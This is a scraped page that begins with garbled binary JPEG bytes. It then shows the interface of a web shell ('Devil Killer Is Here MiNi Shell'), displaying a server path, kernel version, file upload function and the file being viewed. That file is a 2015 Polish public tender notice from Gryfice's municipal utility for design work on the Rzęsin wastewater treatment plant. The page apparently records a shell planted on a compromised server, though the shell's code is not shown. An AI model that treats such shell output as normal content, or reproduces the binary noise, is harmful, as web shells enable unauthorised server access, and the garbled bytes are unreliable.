JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150723/109625-N-2015.html

<p class="kh_header"><b>Gryfice: Opracowanie kompletnej dokumentacji projektowo-kosztorysowej oraz specyfikacji technicznych wykonania i odbioru robót, wraz z uzyskaniem pozwolenia na budowę, dla przebudowy istniejącej oczyszczalni ścieków w Rzęsinie gm. Gryfice, w ramach zadania inwestycyjnego pn. Opracowanie dokumentacji na budowę oczyszczalni ścieków w Rzęsinie</b><br>
<b>Numer ogłoszenia: 109625 - 2015; data zamieszczenia: 23.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych w Gryficach , ul. Zielona 5, 72-300 Gryfice, woj. zachodniopomorskie, tel. 91 3842047, faks 91 3842214.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.zgk.gryfice.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompletnej dokumentacji projektowo-kosztorysowej oraz specyfikacji technicznych wykonania i odbioru robót, wraz z uzyskaniem pozwolenia na budowę, dla przebudowy istniejącej oczyszczalni ścieków w Rzęsinie gm. Gryfice, w ramach zadania inwestycyjnego pn. Opracowanie dokumentacji na budowę oczyszczalni ścieków w Rzęsinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Na przedmiot zamówienia składają się wszelkie badania, opracowania, uzgodnienia, opinie, wnioski do ich 
    uzyskania oraz decyzje administracyjne wraz ze wszystkimi kosztami ich uzyskania, w szczególności:
A. Mapa do celów projektowych w wersji elektronicznej (rastrowa lub wektorowa) wraz z kartą rejestracyjną 
    w PODGiK w Gryficach, obejmująca zakres planowanej inwestycji.
B. Przeprowadzenie na koszt Wykonawcy badań ścieków surowych i oczyszczonych przez autoryzowane 
     laboratorium oraz opracowanie wyników, a także ewentualne inne badania laboratoryjne; warunkowo, 
     jeżeli będzie wymagane usuwanie ze ścieków związków biogennych, zakres badań obejmujący BZT5, 
     ChZT, zawiesina ogólna, pH, azot ogólny, fosfor ogólny - minimum 3 próby średniodobowe.
C. Badania geotechniczne w terenie służące ustaleniu warunków posadowienia projektowanych 
     urządzeń oczyszczalni ścieków oraz opracowanie wyników w formie opinii, wykonane zgodnie             
     z Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 
     2012 r. w sprawie ustalania geotechnicznych warunków posadawiania obiektów budowlanych              
     (Dz. U. z 2012 r. poz. 463). 
D. Karta Informacyjna Przedsięwzięcia lub Raport o Oddziaływaniu na Środowisko (o ile na etapie składania 
     wniosku o  wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia 
     zajdzie potrzeba sporządzenia raportu).
E. Operaty wodnoprawne na odprowadzenie ścieków do odbiornika i na budowę urządzeń wodnych               
     (o ile zaistnieje potrzeba przebudowy wylotu istniejącego).
F. Sporządzenie, złożenie w odpowiednich instytucjach i uzyskanie warunków technicznych przyłączenia            
     do tych mediów, które są niezbędne do kompletnego wykonania przedmiotu zamówienia. 
     UWAGA: do zasilenia projektowanego obiektu w energię elektryczną konieczne jest zaprojektowanie                  
     i wykonanie nowego przyłącza elektroenergetycznego, które należy zlecić operatorowi sieci 
     elektroenergetycznej. Zlecającym usługę wykonania i zaprojektowania będzie Zamawiający. Wykonawca 
     pobierze ze strony internetowej operatora formularz odpowiedniego wniosku o określenie warunków 
     przyłączenia do sieci operatora,  który wypełni, a także sporządzi w dwóch egzemplarzach plan zabudowy 
     lub szkic sytuacyjny określający usytuowanie przyłączanego obiektu względem istniejącej sieci oraz 
     usytuowanie sąsiednich obiektów. Po otrzymaniu ww. materiałów od Wykonawcy, Zamawiający 
     skompletuje wniosek, złoży i odbierze z biura obsługi klienta operatora sieci elektroenergetycznej, 
     niezwłocznie przesyłając Wykonawcy oryginał warunków. Zamawiający poniesie koszt uzyskania 
     warunków technicznych i sfinansowania opracowania projektu przyłącza przez operatora.   
G. Kompletne projekty budowlane i wykonawcze, w zakresie i formie zgodnej z Rozporządzeniem Ministra 
     Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego 
     zakresu i formy projektu budowlanego (Dz. U. z 2012 r. poz. 462 ze zm.) oraz Rozporządzeniem Ministra 
     Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji 
     projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu 
     funkcjonalno-użytkowego (tekst jedn. Dz. U. z 2013 r. poz. 1129), w zakresie niezbędnym                                  
     do prawidłowego zrealizowania robót i uruchomienia obiektu po przebudowie na podstawie                          
     tych projektów.
     Przez sformułowanie kompletne projekty budowlane i wykonawcze Zamawiający rozumie:                       
     - opracowanie projektu budowlanego obejmującego wszystkie branże wraz z zagospodarowaniem terenu             
        i projektem architektoniczno-budowlanym, służącego uzyskaniu decyzji o pozwoleniu na budowę,
     - opracowanie projektów wykonawczych w stopniu szczegółowości umożliwiającym prawidłowe 
        wykonanie, uruchomienie oraz umożliwienie uzyskania po wykonaniu zgodnie z projektem założonych 
        parametrów oczyszczania ścieków przez wybudowane i zamontowane obiekty i urządzenia oczyszczalni 
        w branżach: instalacyjno-technologicznej, konstrukcyjnej, elektrycznej, drogowej, automatyki,  
        telekomunikacji, a także w branżach nie wymienionych wyżej, lecz koniecznych do prawidłowego     
       wykonania i uruchomienia obiektów,
     - w zakresie prac przygotowawczych obejmujących rozbiórki istniejących obiektów, sporządzenie 
        informacji o wytwarzanych odpadach oraz sposobach gospodarowania wytworzonymi odpadami,
     - opracowanie projektu przebudowy wylotu ścieków z oczyszczalni  do odbiornika zgodnie z warunkami   
        pozwolenia wodnoprawnego.                  
H. Specyfikacje techniczne wykonania i odbioru robót dla branż objętych poszczególnymi opracowaniami 
     projektowymi.
I. Kosztorysy inwestorskie dla branż objętych poszczególnymi opracowaniami projektowymi wykonane 
    metodą kalkulacji uproszczonej zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. 
    (Dz. U. nr 130, poz. 1389).
    UWAGA: W ramach niniejszego przedmiotu zamówienia Wykonawca dokona dwóch przecen wszystkich 
    opracowanych kosztorysów inwestorskich pomiędzy datą upływu terminu 6 miesięcy od daty sporządzenia 
     najwcześniej wykonanego kosztorysu, a przed:
     1. terminem  wszczęcia postępowania w sprawie dofinansowania inwestycji realizowanej na podstawie 
         opracowanej przez Wykonawcę dokumentacji projektowej;
     2. terminem wszczęcia postępowania o udzielenie zamówienia na roboty budowlane 
         realizowane na podstawie tej dokumentacji.
     Każda z przecen wszystkich kosztorysów zostanie przeprowadzona po uprzednim zgłoszeniu Wykonawcy 
     potrzeby wykonania danej przeceny, w terminie 14 dni od daty otrzymania przez Wykonawcę pisemnego 
     zgłoszenia Zamawiającego.      
J. Przedmiary robót dla branż objętych poszczególnymi opracowaniami projektowymi w rozumieniu definicji 
    z Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. nr 202, poz. 2072 ze zm.).
K. Instrukcja eksploatacji oczyszczalni.
Poza badaniami i opracowaniami merytorycznymi do przedmiotu zamówienia należy sporządzenie, złożenie do odpowiednich instytucji kompletnych wniosków o wydanie i odbiór decyzji:
a) o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia;
b) o ustaleniu lokalizacji inwestycji celu publicznego;
c) o udzieleniu pozwolenia wodnoprawnego na wprowadzenie ścieków oczyszczonych do rowu 
     melioracyjnego oraz udział w rozprawie;
d) o udzieleniu pozwolenia wodnoprawnego na wykonanie wylotu ścieków oczyszczonych z projektowanej 
    oczyszczalni  oraz udział w rozprawie;
e) o udzieleniu pozwolenia na budowę. 

Wszelkie opracowania analityczne, projektowe, kosztowe i specyfikacje jakościowe, objęte przedmiotem zamówienia, powinny być wykonane w zgodności z przepisami prawa, a w szczególności z:
- ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (tekst jedn. Dz. U. z 2013 r. poz. 1232 ze zm.),
- ustawą z dnia 18 lipca 2001 r. Prawo wodne (tekst jedn. Dz. U. z 2015 r. poz. 469 ze zm.),
- ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2013 r. poz. 1409 ze zm.),
- ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2013 r. poz. 907 ze zm.),
- odnośnymi przepisami wykonawczymi do tych ustaw. 
Do obowiązków Wykonawcy należy:
1) sprawdzenie w terenie warunków wykonania zamówienia.
2) osiągnięcie efektu ekologicznego poprzez  przyjęcie w opracowaniu projektowym najkorzystniejszego  
     ekonomicznie i technologicznie rozwiązania w zakresie oczyszczania ścieków; w tym celu przedstawienie  
     Zamawiającemu pełnej analizy kosztowej, obejmującej tzw. cykl życia produktu, z wyliczeniem kosztów 
     eksploatacji w cenach bieżących, ponoszonych w tym okresie.                            
3) dobór urządzeń i przyjęcie takich rozwiązań, które pozwolą do minimum ograniczyć natężenie hałasu 
     powodowanego pracą urządzeń oczyszczalni oraz do maksimum ograniczyć wydzielanie przykrych 
     zapachów związanych z pracą oczyszczalni (oczyszczalnia będzie zlokalizowana w centrum 
     miejscowości).
4) uzyskanie, przed rozpoczęciem opracowywania dokumentacji projektowej, formalnego uzgodnienia 
    przez Zamawiającego przyjętych założeń projektowych przebudowy istniejącej oczyszczalni ścieków 
    w m. Rzęsin. Zamawiający zobowiązuje się, że w ciągu 1 tygodnia od daty złożenia ww. założeń                        
    wraz z analizą kosztową,  zaakceptuje to opracowanie lub sporządzi pisemną opinię, w której przedstawi 
    swoje stanowisko.
5) konsultacje z Zamawiającym na każdym etapie opracowywania dokumentacji, dotyczące istotnych, 
    mających wpływ na koszty elementów, tj. rozwiązań funkcjonalnych, konstrukcyjnych, materiałowych, 
    przy jednoczesnym założeniu, że zaproponowane rozwiązania i materiały zapewnią minimalizację kosztów  
    przy zachowaniu optymalnej proporcji ceny do jakości.
6) opisywanie proponowanych materiałów i urządzeń za pomocą parametrów technicznych,                            
     tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe i jedyną możliwością będzie podanie nazwy 
     materiału lub urządzenia, to Wykonawca zobowiązany jest do podania co najmniej dwóch producentów  
     tych materiałów lub urządzeń oraz określenia minimalnych wymagań dotyczących ich równoważności.
7) w przypadku zaproponowania w ofertach przetargowych na wykonanie robót budowlanych, materiałów 
     lub urządzeń równoważnych, tzn. o parametrach nie gorszych niż przedstawione w opracowanej 
     dokumentacji projektowej - Wykonawca (Projektant) zobowiązuje się do wydania, na etapie analizy ofert  
     i na wniosek Zamawiającego, pisemnej opinii na temat parametrów tych materiałów lub urządzeń.
8) przyjęcie do zaprojektowania przedmiotu zamówienia wyłącznie takich wyrobów budowlanych, które 
    spełniają wymogi ustawy z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (tekst jedn. Dz. U. z 2014 r. 
    poz. 935). 
9) udzielanie odpowiedzi na pytania związane z dokumentacją projektową czy też zapisami specyfikacji  
    istotnych warunków zamówienia opracowanymi na jej podstawie, jakie będą składane w trakcie trwania  
    procedury przetargowej na wykonanie robót budowlanych. 
10) reprezentowanie Zamawiającego przed instytucjami i organami administracyjnymi na podstawie 
      pełnomocnictwa udzielonego Wykonawcy przez Zamawiającego.
11) przekazywanie Zamawiającemu comiesięcznych, pisemnych informacji o stanie zawansowania 
      prac przy projekcie i powiadamianie o napotkanych istotnych przeszkodach i trudnościach w realizacji 
      projektu, bezzwłocznie po powzięciu wiadomości o ich zaistnieniu, w celu wspólnego, bieżącego 
      rozwiązywania tych problemów. 
12) pełnienie nadzoru autorskiego, którym mowa w § 4 wzoru umowy.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca zobowiązany jest wnieść wadium w wysokości 1.000,00 PLN (słownie: jeden tysiąc złotych   
    00/100) przed terminem składania ofert.
2.	Wadium może być wniesione w:
1)	pieniądzu;
2)	poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,                     z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia                 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r.  Nr 42, poz. 275 z późn. zm.).
3. Szczegółowe informacje na temat warunków wniesienia wadium zawarte są w rozdziale VIII SIWZ</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności  jest   krótszy  -  w  tym   okresie,   zrealizował               co   najmniej   jedną  usługę polegającą na zaprojektowaniu i uzyskaniu pozwolenia na budowę, przebudowę lub remont oczyszczalni ścieków  (usługi mogły być realizowane w ramach jednej umowy              lub kilku umów) i wartości co najmniej 20.000,00 zł brutto.                                                                                          
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający                  nie wymaga, aby każdy z Wykonawców wykazał spełnianie w/w warunku oddzielnie. Do uznania spełniania warunku, wystarczające będzie, jak tylko jeden Wykonawca wykaże się wymaganą wiedzą                   i doświadczeniem.
W przypadku, gdy żaden z Wykonawców nie posiada wymaganej wiedzy i doświadczenia, może on polegać na wiedzy i doświadczeniu innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp. Pamiętać należy jednak, że zasób wiedzy i doświadczenia jest nierozerwalnie związany z podmiotem go udostępniającym niemożliwym do samodzielnego obrotu bez zaangażowania się tego podmiotu                       w realizację zamówienia. Oznacza to że nie można tymi zasobami podzielić się z innym wykonawcą tylko w sferze abstrakcyjnego zobowiązania bez jego zastosowania w praktyce. Bez zagwarantowania stosownego zaangażowania podmiotu udostępniającego swój zasób wiedzy i doświadczenia przy realizacji zamówienia możliwość dysponowania potencjałem przez wykonawcę zamawiający uzna za iluzoryczną. 
W niniejszym postępowaniu pod pojęciem wiedzy i doświadczenia należy rozumieć wykonanie,                       a nie tylko wykazanie dwóch usług. Z tych względów nie jest dopuszczalne sumowanie przez Wykonawcę, w celu osiągnięcia wymaganego poziomu wiedzy i doświadczenia, świadczeń w zakresie usług projektowych obejmujących przedmiot zamówienia, nie posiadających wymaganej w niniejszym postępowaniu wiedzy i doświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają uprawnienia projektowe określone przepisami Prawa Budowlanego, w następujących specjalnościach:       a) konstrukcyjno-budowlanej bez ograniczeń;
b) instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych o kanalizacyjnych bez ograniczeń;            c) instalacyjno-inżynieryjnej w zakresie ochrony środowiska; 
d) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych                              
    bez ograniczeń;
e) instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń;
f) inżynieryjnej drogowej bez ograniczeń.
Uwaga:
Projektanci powinni posiadać uprawnienia budowlane bez ograniczeń zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2013 r. poz. 1409 z późn. zm.) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. poz. 1278) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone   w art. 12 ust. 1 ustawy, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane za zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jedn. Dz. U. Nr 63, poz. 394 z późn. zm.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
